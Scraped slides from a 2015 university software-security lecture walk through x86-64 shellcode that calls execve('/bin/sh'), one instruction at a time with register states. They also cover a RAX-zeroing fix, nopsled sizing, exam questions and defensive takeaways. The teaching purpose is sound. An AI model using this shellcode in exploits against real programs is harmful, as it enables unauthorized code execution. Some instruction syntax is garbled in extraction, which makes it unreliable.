SLIDE 1
Assignment 5b Software and Web Security March 24 th , 2015 Initial - - PowerPoint PPT Presentation
Assignment 5b Software and Web Security March 24 th , 2015 Initial - - PowerPoint PPT Presentation
Assignment 5b Software and Web Security March 24 th , 2015 Initial state RAX 0x???????????????? RBX 0x???????????????? RDX 0x???????????????? RDI RSI stack RSP xor %rdx, %rdx RAX 0x???????????????? RBX 0x???????????????? RDX
SLIDE 2
SLIDE 3
xor %rdx, %rdx
RAX 0x???????????????? RBX 0x???????????????? RDX 0x???????????????? RDI RSI stack RSP
SLIDE 4
xor %rdx, %rdx
RAX 0x???????????????? RBX 0x???????????????? RDX 0x???????????????? RDI RSI stack RSP
SLIDE 5
xor %rdx, %rdx
RAX 0x???????????????? RBX 0x???????????????? RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 6
mov $0x68732f6e69622f2f, %rbx
RAX 0x???????????????? RBX 0x???????????????? RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 7
mov $0x68732f6e69622f2f, %rbx
RAX 0x???????????????? RBX 0x???????????????? RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 8
mov $0x68732f6e69622f2f, %rbx
RAX 0x???????????????? RBX 0x68732f6e69622f2f RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 9
shr $0x8, %rbx
RAX 0x???????????????? RBX 0x68732f6e69622f2f RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 10
shr $0x8, %rbx
RAX 0x???????????????? RBX 0x68732f6e69622f2f RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 11
shr $0x8, %rbx
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 12
push %rbx
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 13
push %rbx
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 14
push %rbx
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f RSP
SLIDE 15
mov %rsp, %rdi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f RSP
SLIDE 16
mov %rsp, %rdi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f RSP
SLIDE 17
mov %rsp, %rdi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f RSP
SLIDE 18
mov %rsp, %rdi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f RSP
SLIDE 19
push %rdx
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f RSP
SLIDE 20
push %rdx
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f RSP
SLIDE 21
push %rdx
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 RSP
SLIDE 22
push %rdi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 RSP
SLIDE 23
push %rdi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 RSP
SLIDE 24
push %rdi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 25
push %rdi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 26
mov %rsp, %rsi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 27
mov %rsp, %rsi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 28
mov %rsp, %rsi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 29
mov %rsp, %rsi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 30
mov %0x3b, %al
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 31
mov %0x3b, %al
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 32
mov %0x3b, %al
RAX 0x000000000000003b RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 33
syscall
RAX 0x000000000000003b RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 34
syscall
RAX 0x000000000000003b sys execve RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
sys execve(char *filename, char *argv[], char *envp[]);
SLIDE 35
syscall
RAX 0x000000000000003b sys execve RBX \0hs/nib/ RDX 0x0000000000000000 RDI RSI stack \0hs/nib/ 0x0000000000000000 0x???????????????? RSP
sys execve(char *filename, char *argv[], char *envp[]);
SLIDE 36
syscall
RAX 0x000000000000003b sys execve RBX /bin/sh\0 RDX 0x0000000000000000 RDI RSI stack /bin/sh\0 0x0000000000000000 0x???????????????? RSP
sys execve( “/bin/sh” , [“/bin/sh”], NULL);
SLIDE 37
Lies!
Actually, I lied a bit.
SLIDE 38
mov %0x3b, %al
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 39
mov %0x3b, %al
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 40
mov %0x3b, %al
RAX 0x??????????????3b RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 41
Bugfix:
Ensure that RAX contains 0x0000000000000000. How?
SLIDE 42
xor %rax, %rax
RAX 0x???????????????? RBX 0x???????????????? RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 43
xor %rax, %rax
RAX 0x???????????????? RBX 0x???????????????? RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 44
xor %rax, %rax
RAX 0x0000000000000000 RBX 0x???????????????? RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 45
Bytecode
◮ The bytecode for this is 0x48 0x31 0xc0. ◮ The shellcode gets 3 bytes longer. ◮ So the nopsled should be 3 bytes shorter.
SLIDE 46
Exam Questions
◮ We won’t ask you to write a working exploit using pen and
paper.
◮ But you are expected to be able to answer some questions
about exploiting a vulnerability.
SLIDE 47
Exam Questions
For example: Why won’t the first shown exploit of assignment 5 work when exploiting a buffer copied with strcpy?
SLIDE 48
Takeaways
◮ Use the tools you have at your disposal.
◮ valgrind ◮ address sanitizer ◮ debuggers (gdb, lldb) ◮ ...
◮ Read the documentation! ◮ Do not trust input, and be aware of where all your inputs
come from!
◮ C is unforgiving and doesn’t care if you shoot yourself in the
foot.
SLIDE 49